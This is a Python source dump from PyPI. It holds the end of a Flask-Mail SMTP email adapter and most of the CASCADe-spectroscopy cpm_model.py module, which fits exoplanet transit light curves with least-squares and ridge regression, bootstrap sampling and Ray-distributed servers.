""" Implements the EmailAdapter interface to send emails with SMTP using Flask-Mail."""
def __init__(self, app):
"""Check config settings and setup Flask-Mail.
Args:
app(Flask): The Flask application instance.
"""
super(SMTPEmailAdapter, self).__init__(app)
# Setup Flask-Mail
try:
from flask_mail import Mail
except ImportError:
raise ConfigError(
"The Flask-Mail package is missing. Install Flask-Mail with 'pip install Flask-Mail'.")
self.mail = Mail(app)
def send_email_message(self, recipient, subject, html_message, text_message, sender_email, sender_name):
""" Send email message via Flask-Mail.
Args:
recipient: Email address or tuple of (Name, Email-address).
subject: Subject line.
html_message: The message body in HTML.
text_message: The message body in plain text.
"""
# Construct sender from sender_name and sender_email
sender = '"%s" <%s>' % (sender_name, sender_email) if sender_name else sender_email
# Send email via SMTP except when we're testing
if not current_app.testing: # pragma: no cover
try:
# Prepare email message
from flask_mail import Message
message = Message(
subject,
sender=sender,
recipients=[recipient],
html=html_message,
body=text_message)
# Send email message
self.mail.send(message)
# Print helpful error messages on exceptions
except (socket.gaierror, socket.error) as e:
raise EmailError('SMTP Connection error: Check your MAIL_SERVER and MAIL_PORT settings.')
except smtplib.SMTPAuthenticationError:
raise EmailError('SMTP Authentication error: Check your MAIL_USERNAME and MAIL_PASSWORD settings.') | PypiClean |
/CASCADe-spectroscopy-1.1.14.tar.gz/CASCADe-spectroscopy-1.1.14/cascade/cpm_model/cpm_model.py | import numpy as np
from types import SimpleNamespace
import itertools
from collections.abc import Iterable
import ast
import warnings
import time as time_module
import copy
import ray
from numba import jit
from scipy.linalg import svd
from scipy.linalg import solve_triangular
from scipy.linalg import cholesky
import astropy.units as u
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from ..exoplanet_tools import lightcurve
from ..data_model import SpectralData
from ..data_model import SpectralDataTimeSeries
from cascade import __version__
__all__ = ['ols',
'check_causality', 'select_regressors', 'return_design_matrix',
'log_likelihood', 'modified_AIC', 'create_regularization_matrix',
'return_lambda_grid', 'regressionDataServer',
'rayRegressionDataServer', 'regressionControler',
'rayRegressionControler', 'ridge', 'rayRidge',
'make_bootstrap_samples',
'regressionParameterServer', 'rayRegressionParameterServer',
'regressionWorker', 'rayRegressionWorker']
def ols(design_matrix, data, covariance=None):
r"""
Ordinary least squares.
Parameters
----------
design_matrix : 'numpy.ndarray'
The design or regression matrix used in the regression modeling
data : 'numpy.ndarray'
Vecor of data point to be modeled.
weights : 'numpy.ndarray', optional
Weights used in the regression. Typically the inverse of the
coveraice matrix. The default is None.
Returns
-------
fit_parameters : 'numpy.ndarray'
Linear regirssion parameters.
err_fit_parameters : 'numpy.ndarray'
Error estimate on the regression parameters.
sigma_hat_sqr : 'float'
Mean squared error.
Notes
-----
This routine solves the linear equation
.. math:: A x = y
by finding optimal solution :math:'\hat{x}' by minimizing
.. math::
|| y - A*\hat{x} ||^2
For details on the implementation see [1]_, [2]_, [3]_, [4]_
References
----------
.. [1] PHD thesis by Diana Maria SIMA, "Regularization techniques in
Model Fitting and Parameter estimation", KU Leuven 2006
.. [2] Hogg et al 2010, "Data analysis recipies: Fitting a model to data"
.. [3] Rust & O'Leaary, "Residual periodograms for choosing regularization
parameters for ill-posed porblems"
.. [4] Krakauer et al "Using generalized cross-validationto select
parameters in inversions for regional carbon fluxes"
Examples
--------
>>> import numpy as np
>>> from cascade.cpm_model import solve_linear_equation
>>> A = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1], [1, 1, 0], [-1, 1, 0]])
>>> coef = np.array([4, 2, 7])
>>> b = np.dot(A, coef)
>>> b = b + np.random.normal(0.0, 0.01, size=b.size)
>>> results = solve_linear_equation(A, b)
>>> print(results)
"""
if not isinstance(covariance, type(None)):
Gcovariance = cholesky(covariance, lower=True)
weighted_design_matrix = solve_triangular(Gcovariance, design_matrix,
lower=True,
check_finite=False)
data_weighted = solve_triangular(Gcovariance, data, lower=True,
check_finite=False)
scaling_matrix = np.diag(np.full(len(data_weighted),
1.0/np.mean(data_weighted)))
data_weighted = np.dot(scaling_matrix, data_weighted)
weighted_design_matrix = np.dot(scaling_matrix, weighted_design_matrix)
else:
weighted_design_matrix = design_matrix
data_weighted = data
dim_dm = weighted_design_matrix.shape
if dim_dm[0] - dim_dm[1] < 1:
AssertionError("Wrong dimensions of design matrix: \
more regressors as data; Aborting")
# First make SVD of design matrix A
U, sigma, VH = svd(weighted_design_matrix)
# residual_not_reg = (u[:,rnk:].dot(u[:,rnk:].T)).dot(y)
residual_not_reg = np.linalg.multi_dot([U[:, dim_dm[1]:],
U[:, dim_dm[1]:].T, data_weighted])
# calculate the filter factors
F = np.identity(sigma.shape[0])
Fsigma_inv = np.diag(1.0/sigma)
# Solution of the linear system
fit_parameters = np.linalg.multi_dot([VH.T, Fsigma_inv,
U.T[:dim_dm[1], :], data_weighted])
# calculate the general risidual vector (b-model), which can be caculated
# by using U1 (mxn) and U2 (mxm-n), with U=[U1,U2]
residual_reg = residual_not_reg + \
np.linalg.multi_dot([U[:, :dim_dm[1]], np.identity(dim_dm[1]) - F,
U[:, :dim_dm[1]].T, data_weighted])
effective_degrees_of_freedom = (dim_dm[0] - dim_dm[1])
sigma_hat_sqr = np.dot(residual_reg.T, residual_reg) / \
effective_degrees_of_freedom
# calculate the errors on the fit parameters
err_fit_parameters = np.sqrt(sigma_hat_sqr *
np.diag(np.linalg.multi_dot([VH.T,
Fsigma_inv**2,
VH])))
return fit_parameters, err_fit_parameters, sigma_hat_sqr
def ridge(input_regression_matrix, input_data, input_covariance,
input_delta, input_alpha):
r"""
Ridge regression.
Parameters
----------
input_regression_matrix : 'numpy.ndarray'
The design or regression matrix used in the regularized least square
fit.
input_data : 'numpy.ndarray'
Vector of data to be fit.
input_covariance : 'numpy.ndarray'
Covariacne matrix used as weight in the least quare fit.
input_delta : 'numpy.ndarray'
Regularization matrix. For ridge regression this is the unity matrix.
input_alpha : 'float' or 'numpy.ndarray'
Regularization strength.
Returns
-------
beta : 'numpy.ndarray'
Fitted regression parameters.
rss : 'float'
Sum of squared residuals.
mse : 'float'
Mean square error
degrees_of_freedom : 'float'
The effective degress of Freedo of the fit.
model_unscaled : 'numpy.ndarray'
The fitted regression model.
optimal_regularization : 'numpy.ndarray'
The optimal regularization strength determened by generalized cross
validation.
aicc : float'
Corrected Aikake information criterium.
Notes
-----
This routine solves the linear equation
.. math:: A x = y
by finding optimal solution :math:'\^x' by minimizing
.. math::
|| y - A*\hat{x} ||^2 + \lambda * || \hat{x} ||^2
For details on the implementation see [5]_, [6]_, [7]_, [8]_
References
----------
.. [5] PHD thesis by Diana Maria SIMA, "Regularization techniques in
Model Fitting and Parameter estimation", KU Leuven 2006
.. [6] Hogg et al 2010, "Data analysis recipies: Fitting a model to data"
.. [7] Rust & O'Leaary, "Residual periodograms for choosing regularization
parameters for ill-posed porblems"
.. [8] Krakauer et al "Using generalized cross-validationto select
parameters in inversions for regional carbon fluxes"
Examples
--------
>>> import numpy as np
>>> from cascade.cpm_model import solve_linear_equation
>>> A = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1], [1, 1, 0], [-1, 1, 0]])
>>> coef = np.array([4, 2, 7])
>>> b = np.dot(A, coef)
>>> b = b + np.random.normal(0.0, 0.01, size=b.size)
>>> results = solve_linear_equation(A, b)
>>> print(results)
"""
n_data, n_parameter = input_regression_matrix.shape
# Get data and regression matrix
Gcovariance = cholesky(input_covariance, lower=True)
regression_matrix = solve_triangular(Gcovariance, input_regression_matrix,
lower=True, check_finite=False)
data = solve_triangular(Gcovariance, input_data, lower=True,
check_finite=False)
scaling_matrix = np.diag(np.full(len(data),
1.0/np.mean(data)))
data = np.dot(scaling_matrix, data)
regression_matrix = np.dot(scaling_matrix, regression_matrix)
# Start of regression with SVD
U, D, Vh = svd(regression_matrix, full_matrices=False, check_finite=False,
overwrite_a=True, lapack_driver='gesdd')
R = np.dot(U, np.diag(D))
delta = np.dot(np.dot(Vh, input_delta), Vh.T)
RY = np.dot(R.T, data)
unity_matrix_ndata = np.identity(n_data)
if isinstance(input_alpha, Iterable):
gcv_list = []
mse_list = []
for alpha_try in input_alpha:
F = np.diag(D**2) + alpha_try*delta
G = cholesky(F, lower=True)
x = solve_triangular(G, R.T, lower=True, check_finite=False)
H = np.dot(x.T, x)
residual = np.dot(unity_matrix_ndata-H, data)
rss = np.dot(residual.T, residual)
degrees_of_freedom = np.trace(H)
if (n_data-degrees_of_freedom) >= 1:
mse = rss/(n_data-degrees_of_freedom)
gcv = n_data*(np.trace(unity_matrix_ndata-H))**-2 * rss
else:
mse = 1.e16
gcv = 1.e16
gcv_list.append(gcv)
mse_list.append(mse)
opt_idx = np.argmin(gcv_list)
optimal_regularization = input_alpha[opt_idx]
else:
optimal_regularization = input_alpha
# Solve linear system with optimal regularization
F = np.diag((D)**2) + optimal_regularization*delta
G = cholesky(F, lower=True)
x = solve_triangular(G, R.T, lower=True, check_finite=False)
H = np.dot(x.T, x)
x = solve_triangular(G, RY, lower=True, check_finite=False)
x = solve_triangular(G.T, x, lower=False, check_finite=False)
beta = np.dot(Vh.T, x)
residual = np.dot(unity_matrix_ndata-H, data)
rss = np.dot(residual.T, residual)
degrees_of_freedom = np.trace(H)
mse = rss/(n_data-degrees_of_freedom)
aicc = n_data*np.log(rss) + 2*degrees_of_freedom + \
(2*degrees_of_freedom * (degrees_of_freedom+1)) / \
(n_data-degrees_of_freedom-1)
# model_optimal = np.dot(H, data)
model_unscaled = np.dot(input_regression_matrix, beta)
return beta, rss, mse, degrees_of_freedom, model_unscaled, \
optimal_regularization, aicc
rayRidge = ray.remote(num_returns=6)(ridge)
def check_causality():
"""
Check if all data has a causal connection.
Returns
-------
causal_mask : ndarray of 'bool'
Mask of data which has good causal connection with other data.
"""
causal_mask = True
return causal_mask
def select_regressors(selection_mask, exclusion_distance):
"""
Return list with indici of the regressors for each wavelength data point.
Parameters
----------
selectionMask : 'ndarray' of 'bool'
Mask selection all data for which a regressor matrix have to be
constructed.
exclusion_distance : 'int'
Minimum distance to data point within no data is selected to be used
as regressor.
Returns
-------
regressor_list : 'list'
list of indicex pais of data index and indici of the data used as
regressors for the specified data point.
"""
if selection_mask.ndim == 1:
selection_mask = np.expand_dims(selection_mask, axis=1)
used_data_index = \
[tuple(coord) for coord in np.argwhere(~selection_mask).tolist()]
all_data_index = list(np.where(~selection_mask))
ndatapoints = len(used_data_index)
regressor_list = []
for coord in used_data_index:
idx = np.abs(coord[0]-all_data_index[0]) >= exclusion_distance
regressor_list.append([coord, (all_data_index[0][idx],
all_data_index[1][idx]),
ndatapoints])
return regressor_list
def return_PCA(matrix, n_components):
"""
Return PCA componentns of input matrix.
Parameters
----------
matrix : 'numpy.ndarray'
Input matrix for whcih the principal components are calculated.
n_components : 'int'
Number of PCA composnents.
Returns
-------
pca_matrix : 'numpy.ndarray'
The principal components.
pca_back_transnformation : 'function'
The function which back-transforms the PC into the original matrix.
"""
pca = PCA(n_components=np.min([n_components, matrix.shape[0]]),
whiten=False, svd_solver='auto')
pca_matrix = pca.fit_transform(matrix.T).T
pca_scores = pca.components_.T
return pca_matrix, pca_scores
# @jit(nopython=True, cache=True, parallel=True)
def log_likelihood(data, covariance, model):
"""
Calculate the log likelihood.
Parameters
----------
data : 'ndarray'
Data array to be modeled
covariance : 'ndarray'
The covariance of the data.
model : 'ndarray'
Regression model of the data.
Returns
-------
lnL : 'float'
Log likelihood.
Notes
-----
For the determinent term in the log likelyhood calculation use:
2*np.sum(np.log(np.diag(np.linalg.cholesky(covariance))))
np.dot(np.dot((data-model), np.diag(weights)), (data-model))
"""
ndata = len(data)
residual = data-model
# Cholesky decomposition and inversion:
G = cholesky(covariance, lower=True)
RG = solve_triangular(G, residual, lower=True, check_finite=False)
lnL = -0.5*(ndata*np.log(2.0*np.pi) +
2*np.sum(np.log(np.diag(G))) +
np.dot(RG.T, RG))
return lnL
@jit(nopython=True, cache=True)
def modified_AIC(lnL, n_data, n_parameters):
"""
Calculate the modified AIC.
Parameters
----------
lnL : 'float'
Log likelihood.
n_data : 'int'
Number of data points
n_parameters : 'int'
Number of free model parameters.
Returns
-------
AICc : 'float'
modelifed Aikake information criterium.
"""
AIC = -2*lnL + 2*n_parameters
AICc = AIC + (2*n_parameters*(n_parameters+1))/(n_data-n_parameters-1)
return AICc
def create_regularization_matrix(method, n_regressors, n_not_regularized):
"""
Create regularization matrix.
Two options are implemented: The first one 'value' returns a penalty
matrix for the clasical ridge rigression. The second option 'derivative'
is consistend with fused ridge penalty (as introduced by Goeman, 2008).
Parameters
----------
method : 'string'
Method used to calculated regularization matrix. Allawed values
are 'value' or 'derivative'
n_regressors : 'int'
Number of regressors.
n_not_regularized : 'int'
Number of regressors whi should not have a regulariation term.
Raises
------
ValueError
Incase the method input parameter has a wrong value a ValueError is
raised.
Returns
-------
delta : 'ndarray'
Regularization matrix.
"""
allowed_methods = ['value', 'derivative']
if method not in allowed_methods:
raise ValueError("regularization method not recognized. "
"Allowd values are: {}".format(allowed_methods))
if method == 'value':
# regularization on value
delta = np.diag(np.zeros((n_regressors)))
delta[n_not_regularized:, n_not_regularized:] += \
np.diag(np.ones(n_regressors-n_not_regularized))
elif method == 'derivative':
# regularazation on derivative
delta_temp = np.diag(-1*np.ones(n_regressors-n_not_regularized-1), 1) +\
np.diag(-1*np.ones(n_regressors-n_not_regularized-1), -1) + \
np.diag(2*np.ones(n_regressors-n_not_regularized))
delta_temp[0, 0] = 1.0
delta_temp[-1, -1] = 1.0
#delta_temp = delta_temp/np.linspace(1,3, delta_temp.shape[0])**2
delta = np.diag(np.zeros((n_regressors)))
delta[n_not_regularized:, n_not_regularized:] += delta_temp
return delta
def return_lambda_grid(lambda_min, lambda_max, n_lambda):
"""
Create grid for regularization parameters lambda.
Parameters
----------
lambda_min : TYPE
DESCRIPTION.
lambda_max : TYPE
DESCRIPTION.
n_lambda : TYPE
DESCRIPTION.
Returns
-------
lambda_grid : TYPE
DESCRIPTION.
"""
if n_lambda <= 1:
lambda_grid = np.array([lambda_min])
return lambda_grid
delta_lam = np.abs(np.log10(lambda_max)-np.log10(lambda_min))/(n_lambda-1)
lambda_grid = 10**(np.log10(lambda_min) +
np.linspace(0, n_lambda-1, n_lambda)*delta_lam)
return lambda_grid
def make_bootstrap_samples(ndata, nsamples):
"""
Make bootstrap sample indicii.
Parameters
----------
ndata : 'int'
Number of data points.
nsamples : 'int'
Number of bootstrap samples.
Returns
-------
bootsptrap_indici : 'ndarray' of 'int'
(nsample+1 X ndata) array containing the permutated indicii of the
data array. The first row is the unsampled list of indici.
non_common_indici : 'list'
For ech nootstrap sampling, list of indici not sampled.
"""
all_indici = np.arange(ndata)
bootsptrap_indici = np.zeros((nsamples+1, ndata), dtype=int)
non_common_indici = []
bootsptrap_indici[0, :] = all_indici
non_common_indici.append(np.setxor1d(all_indici, all_indici))
np.random.seed(1984)
for i in range(nsamples):
bootsptrap_indici[i+1, :] = np.sort(np.random.choice(ndata, ndata))
non_common_indici.append(np.setxor1d(all_indici,
bootsptrap_indici[i+1, :]))
return bootsptrap_indici, non_common_indici
def return_design_matrix(data, selection_list):
"""
Return the design matrix based on the data set itself.
Parameters
----------
data : 'ndarray'
Input timeseries data.
selection_list : 'tuple'
Tuple containing the indici of the data used as regressor for a
given wvelength (index).
Returns
-------
design_matrix : 'ndarray'
Design matrix.
"""
(il, ir), (idx_cal, trace), nwave = selection_list
if data.ndim == 2:
data = data[:, np.newaxis, :].copy()
design_matrix = data[idx_cal, trace, :]
return design_matrix
class regressionDataServer:
"""
Class which provied all needed input daqta for the regression modeling.
The is class load the data and cleaned data to define for each
wavelength the timeseries data at that wavelength which will be
abalysed and the regressors which will be used for the analysis.
"""
def __init__(self, dataset, regressor_dataset):
self.fit_dataset = copy.deepcopy(dataset)
self.regressor_dataset = copy.deepcopy(regressor_dataset)
self.RS = StandardScaler()
def sync_with_parameter_server(self, parameter_server_handle):
"""
Sync data server with the parameter server.
Parameters
----------
parameter_server_handle : 'regressionParameterServer'
instance of the regressionParameterServer class.
Returns
-------
None.
"""
self.cascade_configuration = \
parameter_server_handle.get_configuration()
self.regression_parameters = \
parameter_server_handle.get_regression_parameters()
def get_data_info(self):
"""
Get the relevant information of the observations.
Returns
-------
ndim : 'int'
Dimension of the dataset.
shape : 'tuple'
Shape of the dataset.
ROI : 'ndarray'
Region of interest.
data_unit : 'astropy unit'
Physical unit of the data.
wavelength_unit : 'astropy unit'
Physical unit of the wavelength.
time_unit : 'astropy unit'
Unit of the time.
time_bjd_zero : 'float'
Time in BJD of first integration
data_product : 'string'
Data product.
"""
ndim = self.fit_dataset.data.ndim
shape = self.fit_dataset.data.shape
ROI = self.regressor_dataset.mask.any(axis=1)
data_unit = self.regressor_dataset.data_unit
wavelength_unit = self.regressor_dataset.wavelength_unit
time_unit = self.regressor_dataset.time_unit
time_bjd_zero = self.fit_dataset.time_bjd.data.flat[0]
data_product = self.fit_dataset.dataProduct
return ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
time_bjd_zero, data_product
def initialze_lightcurve_model(self):
"""
Initialize the ligthcurve model.
Returns
-------
None.
"""
self.lightcurve_model = lightcurve(self.cascade_configuration)
try:
time_offset = \
ast.literal_eval(self.cascade_configuration.model_time_offset)
except AttributeError:
time_offset = 0.0
fit_lightcurve_model, fit_ld_correcton, fit_dilution_correction = \
self.lightcurve_model.interpolated_lc_model(
self.fit_dataset, time_offset=time_offset
)
mid_transit_time = \
self.lightcurve_model.return_mid_transit(
self.fit_dataset, time_offset=time_offset
)
self.fit_lightcurve_model = fit_lightcurve_model
self.fit_ld_correcton = fit_ld_correcton
self.fit_dilution_correction = fit_dilution_correction
self.mid_transit_time = mid_transit_time
self.fit_ld_coefficients = self.lightcurve_model.limbdarkning_model.ld
def get_lightcurve_model(self):
"""
Get the lightcurve model.
Returns
-------
'tuple'
Tuple containing the lightcurve model, the limbdarkening
correction,the dilution correction, the lightcurve model
parameters and the mid transit time.
"""
return (self.fit_lightcurve_model, self.fit_ld_correcton,
self.fit_ld_coefficients, self.fit_dilution_correction,
self.lightcurve_model.par, self.mid_transit_time)
def unpack_datasets(self):
"""
Unpack al datasets into masked arrays.
Returns
-------
None.
"""
self.unpack_regressor_dataset()
self.unpack_fit_dataset()
def unpack_regressor_dataset(self):
"""
Unpack dataset containing data to be used as regressors.
Returns
-------
None.
"""
self.regressor_data = \
self.regressor_dataset.return_masked_array('data')
np.ma.set_fill_value(self.regressor_data, 0.0)
# note we use the fit_dataset here as additional info is always
# attached to the main dataset, not the cleaned one.
for regressor in self.regression_parameters.additional_regressor_list:
if regressor.split('_')[0] == 'time':
temp0 = self.fit_dataset.return_masked_array('time')
temp1 = (temp0-np.min(temp0))/(np.max(temp0)-np.min(temp0))
order = int(regressor.split('_')[1])
setattr(self, 'regressor_'+regressor, (-temp1)**order)
elif regressor.split('_')[0] == 'position':
temp0 = self.fit_dataset.return_masked_array('position')
temp1 = (temp0-np.min(temp0))/(np.max(temp0)-np.min(temp0))
order = int(regressor.split('_')[1])
setattr(self, 'regressor_'+regressor, (temp1)**order)
else:
setattr(self, 'regressor_'+regressor,
self.fit_dataset.return_masked_array(regressor))
def unpack_fit_dataset(self):
"""
Unpack dataset containing data to be fitted.
Returns
-------
None.
"""
self.fit_data = self.fit_dataset.return_masked_array('data')
np.ma.set_fill_value(self.fit_data, 0.0)
self.fit_data_wavelength = \
self.fit_dataset.return_masked_array('wavelength')
self.fit_data_uncertainty = \
self.fit_dataset.return_masked_array('uncertainty')
np.ma.set_fill_value(self.fit_data_uncertainty, 1.e8)
self.fit_data_time = self.fit_dataset.return_masked_array('time')
@staticmethod
def select_regressors(data, selection, bootstrap_indici=None):
"""
Return the design matrix for a given selection.
This function selects the data to be used as regressor. To be used in
combination with the select_data function.
Parameters
----------
data : 'ndarray'
Spectroscopic data.
selection : 'tuple'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
design_matrix : 'ndarray'
The design matrix used in the regression analysis.
"""
(_, _), (index_disp_regressors, index_cross_disp_regressors), _ = \
selection
if bootstrap_indici is None:
bootstrap_indici = np.arange(data.shape[-1])
if data.ndim == 2:
regressor_matrix = data[:, np.newaxis, :]
return \
regressor_matrix[index_disp_regressors,
index_cross_disp_regressors, :][...,
bootstrap_indici]
@staticmethod
def select_data(data, selection, bootstrap_indici=None):
"""
Return the data for a given selection.
This functions selects the data for to be used the the regression
analysis. To be used in combination with the select_regressors
function.
Parameters
----------
data : 'ndarray'
Spectroscopic data..
selection : 'tuple'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
design_matrix : 'ndarray'
The selected data to me modeled.
"""
(index_dispersion, index_cross_dispersion), (_, _), _ = \
selection
if bootstrap_indici is None:
bootstrap_indici = np.arange(data.shape[-1])
if data.ndim == 2:
selected_data = data[:, np.newaxis, :]
return selected_data[index_dispersion,
index_cross_dispersion, :][..., bootstrap_indici]
def setup_regression_data(self, selection, bootstrap_indici=None):
"""
Setupe the data which will be fitted.
Parameters
----------
selection : 'tuple'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
None.
"""
if bootstrap_indici is None:
bootstrap_indici = np.arange(self.fit_data.shape[-1])
selected_fit_data = \
self.select_data(self.fit_data, selection,
bootstrap_indici=bootstrap_indici)
selected_fit_wavelength = \
self.select_data(self.fit_data_wavelength, selection,
bootstrap_indici=bootstrap_indici)
selected_fit_wavelength = np.ma.median(selected_fit_wavelength)
selected_fit_time = \
self.select_data(self.fit_data_time, selection,
bootstrap_indici=bootstrap_indici).data
selected_covariance = \
np.ma.diag(self.select_data(self.fit_data_uncertainty, selection,
bootstrap_indici=bootstrap_indici)**2)
selected_covariance.set_fill_value(1.e16)
self.regression_data_selection = \
(selected_fit_data.filled(), selected_fit_wavelength,
selected_fit_time, selected_covariance.filled(),
selected_fit_data.mask)
def setup_regression_matrix(self, selection, bootstrap_indici=None):
"""
Define the regression matrix.
Parameters
----------
selection : 'tuple'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
None.
"""
if bootstrap_indici is None:
bootstrap_indici = np.arange(self.regressor_data.shape[-1])
regression_matrix = \
self.select_regressors(self.regressor_data, selection,
bootstrap_indici=bootstrap_indici)
additional_regressors = []
for regressor in self.regression_parameters.additional_regressor_list:
additional_regressors.append(
self.select_data(getattr(self, 'regressor_'+regressor),
selection,
bootstrap_indici=bootstrap_indici)
)
n_additional = len(additional_regressors) + 2
regression_matrix = \
np.vstack(additional_regressors+[regression_matrix])
regression_matrix = self.RS.fit_transform(regression_matrix.T).T
lc = self.select_data(self.fit_lightcurve_model, selection,
bootstrap_indici=bootstrap_indici)
intercept = np.ones_like(lc)
regression_matrix = np.vstack([intercept, lc, regression_matrix]).T
self.regression_matrix_selection = \
(regression_matrix, n_additional, self.RS.mean_, self.RS.scale_)
def get_regression_data(self, selection, bootstrap_indici=None):
"""
Get all relevant data.
Parameters
----------
selection : 'tuple'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
'ndarray'
Data to be modeled.
'ndarray'
Design matrix for te regression analysis of the data.
"""
self.setup_regression_data(selection,
bootstrap_indici=bootstrap_indici)
self.setup_regression_matrix(selection,
bootstrap_indici=bootstrap_indici)
return self.regression_data_selection, self.regression_matrix_selection
def get_all_regression_data(self, selection_list, bootstrap_indici=None):
"""
Get all relevant data for a slection list for a single bootstrap step.
Parameters
----------
selection_list : 'list'
Tuple containing the indici of the data to be used as regressors
for each wavelength (index).
bootstrap_indici : 'ndarray' of 'int', optional
The time indici indicating which data to be used for a bootstrap
sampling. The default is None.
Returns
-------
'ndarray'
Data to be modeled.
'ndarray'
Design matrix for te regression analysis of the data.
"""
regression_selection_list = []
for selection in selection_list:
regression_selection = \
self.get_regression_data(selection,
bootstrap_indici=bootstrap_indici)
regression_selection_list.append(regression_selection)
return regression_selection_list
def get_regression_data_chunk(self, iterator_chunk):
"""
Get all relevant data for a chunck of the regression iteration.
Parameters
----------
iterator_chunk : 'list'
list containing the tuple containing the indici of the data to
be used as regressors for each wavelength (index) and the bootstrap
time indici indicating which data to be used for a bootstrap
sampling.
Returns
-------
regression_selection_list : 'list'
List containing the data to be modeled and the corresponding
design matrix for te regression analysis of the data.
"""
regression_selection_list = []
for (_, bootstrap_indici),\
(_, selection) in iterator_chunk:
regression_selection = \
self.get_regression_data(selection,
bootstrap_indici=bootstrap_indici)
regression_selection_list.append(regression_selection)
return regression_selection_list
def initialize_data_server(self, parameter_server_handle):
"""
Initialize the data server.
Parameters
----------
parameter_server_handle : 'regressionParameterServer'
insatance of the regressionParameterServer class.
Returns
-------
None.
"""
self.sync_with_parameter_server(parameter_server_handle)
self.unpack_datasets()
self.initialze_lightcurve_model()
@ray.remote
class rayRegressionDataServer(regressionDataServer):
"""Ray wrapper regressionDataServer class."""
def __init__(self, dataset, regressor_dataset):
super().__init__(dataset, regressor_dataset)
get_regression_data = \
ray.method(num_returns=2)(regressionDataServer.get_regression_data)
get_all_regression_data = \
ray.method(num_returns=1)(regressionDataServer.get_all_regression_data)
get_regression_data_chunk = \
ray.method(num_returns=1)(regressionDataServer.get_regression_data_chunk)
get_data_info = \
ray.method(num_returns=8)(regressionDataServer.get_data_info)
get_lightcurve_model =\
ray.method(num_returns=6)(regressionDataServer.get_lightcurve_model)
def sync_with_parameter_server(self, parameter_server_handle):
"""
Sync the regression server with the parameter server.
Parameters
----------
parameter_server_handle : 'regressionParameterServer'
insatance of the regressionParameterServer class.
Returns
-------
None.
"""
self.cascade_configuration = \
ray.get(parameter_server_handle.get_configuration.remote())
self.regression_parameters = \
ray.get(parameter_server_handle.get_regression_parameters.remote())
class regressionParameterServer:
"""
Class which provied the parameter server for the regression modeling.
The is class contains all parameters needed for the regression analysis
and the fitted results.
"""
def __init__(self, cascade_configuration):
self.cascade_configuration = cascade_configuration
self.cpm_parameters = SimpleNamespace()
self.initialize_regression_configuration()
self.data_parameters = SimpleNamespace()
self.regularization = SimpleNamespace()
self.fitted_parameters = SimpleNamespace()
def initialize_regression_configuration(self):
"""
Initialize all regression control parameters.
Returns
-------
None.
"""
self.cpm_parameters.use_multi_processes =\
ast.literal_eval(
self.cascade_configuration.cascade_use_multi_processes)
self.cpm_parameters.max_number_of_cpus = \
ast.literal_eval(
self.cascade_configuration.cascade_max_number_of_cpus)
try:
self.cpm_parameters.cascade_number_of_data_servers = \
ast.literal_eval(
self.cascade_configuration.cascade_number_of_data_servers)
except AttributeError:
self.cpm_parameters.cascade_number_of_data_servers = 1
self.cpm_parameters.nwidth = \
ast.literal_eval(self.cascade_configuration.cpm_deltapix)
self.cpm_parameters.nboot = \
ast.literal_eval(self.cascade_configuration.cpm_nbootstrap)
self.cpm_parameters.alpha_min = \
ast.literal_eval(self.cascade_configuration.cpm_lam0)
self.cpm_parameters.alpha_max = \
ast.literal_eval(self.cascade_configuration.cpm_lam1)
self.cpm_parameters.n_alpha = \
ast.literal_eval(self.cascade_configuration.cpm_nlam)
self.cpm_parameters.add_time = \
ast.literal_eval(self.cascade_configuration.cpm_add_time)
self.cpm_parameters.add_position = \
ast.literal_eval(self.cascade_configuration.cpm_add_position)
self.cpm_parameters.regularize_depth_correction = \
ast.literal_eval(self.cascade_configuration.cpm_regularize_depth_correction)
self.cpm_parameters.sigma_mse_cut = \
ast.literal_eval(self.cascade_configuration.cpm_sigma_mse_cut)
try:
self.cpm_parameters.reg_type_depth_correction = \
self.cascade_configuration.cpm_reg_type_depth_correction
except AttributeError:
self.cpm_parameters.reg_type_depth_correction = 'derivative'
try:
self.cpm_parameters.alpha_min_depth_correction = \
ast.literal_eval(self.cascade_configuration.cpm_lam0_depth_correction)
self.cpm_parameters.alpha_max_depth_correction = \
ast.literal_eval(self.cascade_configuration.cpm_lam1_depth_correction)
self.cpm_parameters.n_alpha_depth_correction = \
ast.literal_eval(self.cascade_configuration.cpm_nlam_depth_correction)
except AttributeError:
self.cpm_parameters.alpha_min_depth_correction = 0.001
self.cpm_parameters.alpha_max_depth_correction = 1.e7
self.cpm_parameters.n_alpha_depth_correction = 100
try:
self.cpm_parameters.number_of_sub_chunks_per_load = \
ast.literal_eval(self.cascade_configuration.cpm_number_of_sub_chunks_per_load)
except AttributeError:
self.cpm_parameters.number_of_sub_chunks_per_load = 300
additional_regressor_list = []
try:
self.cpm_parameters.add_position_model_order = ast.literal_eval(
self.cascade_configuration.cpm_add_position_model_order)
except AttributeError:
self.cpm_parameters.add_position_model_order = 1
if self.cpm_parameters.add_position:
for power in range(1, self.cpm_parameters.add_position_model_order+1):
additional_regressor_list.append('position_{}'.format(power))
# additional_regressor_list.append('position')
try:
self.cpm_parameters.add_time_model_order = ast.literal_eval(
self.cascade_configuration.cpm_add_time_model_order)
except AttributeError:
self.cpm_parameters.add_time_model_order = 1
if self.cpm_parameters.add_time:
for power in range(1, self.cpm_parameters.add_time_model_order+1):
additional_regressor_list.append('time_{}'.format(power))
self.cpm_parameters.additional_regressor_list = \
additional_regressor_list
self.cpm_parameters.n_additional_regressors = \
2 + len(additional_regressor_list)
def get_regression_parameters(self):
"""
Get all parameters controling the regression analysis.
Returns
-------
'simpleNameSpace'
Name spcae holding all parameters controling the regression
analysis.
"""
